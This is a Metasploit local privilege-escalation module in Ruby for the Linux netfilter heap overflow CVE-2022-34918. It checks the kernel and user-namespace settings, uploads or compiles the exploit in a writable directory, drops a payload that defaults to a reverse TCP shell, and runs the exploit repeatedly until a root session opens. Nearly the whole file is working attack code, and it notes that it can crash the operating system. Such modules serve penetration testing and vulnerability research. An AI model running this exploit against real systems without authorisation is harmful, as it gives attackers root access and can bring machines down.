# frozen_string_literal: true ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Common include Msf::Post::Linux::Priv include Msf::Post::Linux::System include Msf::Post::Linux::Kernel include Msf::Post::Linux::Compile include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Netfilter nft_set_elem_init Heap Overflow Privilege Escalation', 'Description' => %q{ An issue was discovered in the Linux kernel through 5.18.9. A type confusion bug in nft_set_elem_init (leading to a buffer overflow) could be used by a local attacker to escalate privileges. The attacker can obtain root access, but must start with an unprivileged user namespace to obtain CAP_NET_ADMIN access. The issue exists in nft_setelem_parse_data in net/netfilter/nf_tables_api.c. }, 'License' => MSF_LICENSE, 'Author' => [ 'Arthur Mongodin <amongodin[at]randorisec.fr> (@_Aleknight_)', # Vulnerability discovery, original exploit PoC 'Redouane NIBOUCHA <rniboucha[at]yahoo.fr>' # Metasploit module, exploit PoC updates ], 'DisclosureDate' => '2022-02-07', 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'SessionTypes' => %w[meterpreter shell], 'DefaultOptions' => { 'Payload' => 'linux/x64/shell_reverse_tcp', 'PrependSetresuid' => true, 'PrependSetresgid' => true, 'PrependFork' => true, 'WfsDelay' => 30 }, 'Targets' => [['Auto', {}]], 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => [UNRELIABLE_SESSION], # The module could fail to get root sometimes. 'Stability' => [OS_RESOURCE_LOSS, CRASH_OS_DOWN], # After too many failed attempts, the system needs to be restarted. 'SideEffects' => [ARTIFACTS_ON_DISK] }, 'References' => [ ['CVE', '2022-34918'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-34918'], ['URL', 'https://ubuntu.com/security/CVE-2022-34918'], ['URL', 'https://www.randorisec.fr/crack-linux-firewall/'], ['URL', 'https://github.com/randorisec/CVE-2022-34918-LPE-PoC'] ] ) ) register_options( [ OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w[Auto True False] ]), OptInt.new('MAX_TRIES', [ true, 'Number of times to execute the exploit', 5]) ] ) register_advanced_options( [ OptString.new('WritableDir', [true, 'Directory to write persistent payload file.', '/tmp']) ] ) end def base_dir datastore['WritableDir'] end def upload_exploit_binary @executable_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) upload_and_chmodx(@executable_path, exploit_data('CVE-2022-34918', 'ubuntu.elf')) register_file_for_cleanup(@executable_path) end def upload_payload_binary @payload_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) upload_and_chmodx(@payload_path, generate_payload_exe) register_file_for_cleanup(@payload_path) end def upload_source @exploit_source_path = ::File.join(base_dir, rand_text_alphanumeric(5..10)) mkdir(@exploit_source_path) register_dir_for_cleanup(@exploit_source_path) dirs = [ '.' ] until dirs.empty? current_dir = dirs.pop dir_full_path = ::File.join(::Msf::Config.install_root, 'external/source/exploits/CVE-2022-34918', current_dir) Dir.entries(dir_full_path).each do |ent| next if ent == '.' || ent == '..' full_path_host = ::File.join(dir_full_path, ent) relative_path = ::File.join(current_dir, ent) full_path_target = ::File.join(@exploit_source_path, current_dir, ent) if File.file?(full_path_host) vprint_status("Uploading #{relative_path} to #{full_path_target}") upload_file(full_path_target, full_path_host) elsif File.directory?(full_path_host) vprint_status("Creating the directory #{full_path_target}") mkdir(full_path_target) dirs.push(relative_path) else print_error("#{full_path_host} doesn't look like a file or a directory") end end end end def compile_source fail_with(Failure::BadConfig, 'make command not available on the target') unless command_exists?('make') info = cmd_exec("make -C #{@exploit_source_path}") vprint_status(info) @executable_path = ::File.join(@exploit_source_path, 'ubuntu.elf') if exists?(@executable_path) chmod(@executable_path, 0o700) unless executable?(@executable_path) print_good('Compilation was successful') else fail_with(Failure::UnexpectedReply, 'Compilation has failed (executable not found)') end end def run_payload success = false 1.upto(datastore['MAX_TRIES']) do |i| vprint_status "Execution attempt ##{i}" info = cmd_exec(@executable_path, @payload_path) info.each_line do |line| vprint_status(line.chomp) end if session_created? success = true break end sleep 3 end if success print_good('A session has been created') else print_bad('Exploit has failed') end end def get_external_source_code(cve, file) file_path = ::File.join(::Msf::Config.install_root, "external/source/exploits/#{cve}/#{file}") ::File.binread(file_path) end def module_check release = kernel_release version = "#{release} #{kernel_version.split(' ').first}" ubuntu_offsets = strip_comments(get_external_source_code('CVE-2022-34918', 'src/util.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first ubuntu_kernels = ubuntu_offsets.scan(/"(.+?)"/).flatten if ubuntu_kernels.empty? fail_with(Msf::Module::Failure::BadConfig, 'Error parsing the list of supported kernels.') end fail_with(Failure::NoTarget, "No offsets for '#{version}'") unless ubuntu_kernels.include?(version) fail_with(Failure::BadConfig, "#{base_dir} is not writable.") unless writable?(base_dir) fail_with(Failure::BadConfig, '/tmp is not writable.') unless writable?('/tmp') if is_root? fail_with(Failure::BadConfig, 'Session already has root privileges.') end end def check config = kernel_config return CheckCode::Unknown('Could not retrieve kernel config') if config.nil? return CheckCode::Safe('Kernel config does not include CONFIG_USER_NS') unless config.include?('CONFIG_USER_NS=y') return CheckCode::Safe('Unprivileged user namespaces are not permitted') unless userns_enabled? return CheckCode::Safe('LKRG is installed') if lkrg_installed? arch = kernel_hardware return CheckCode::Safe("System architecture #{arch} is not supported") unless arch.include?('x86_64') release = kernel_release version, patchlvl = release.match(/^(\d+)\.(\d+)/)&.captures if version&.to_i == 5 && patchlvl && (7..19).include?(patchlvl.to_i) return CheckCode::Appears # ("The kernel #{version} appears to be vulnerable, but no offsets are available for this version") end CheckCode::Safe end def exploit module_check unless datastore['ForceExploit'] if datastore['COMPILE'] == 'True' || (datastore['COMPILE'] == 'Auto' && command_exists?('make')) print_status('Uploading the exploit source code') upload_source print_status('Compiling the exploit source code') compile_source else print_status('Dropping pre-compiled binaries to system...') upload_exploit_binary end print_status('Uploading payload...') upload_payload_binary print_status('Running payload on remote system...') run_payload end end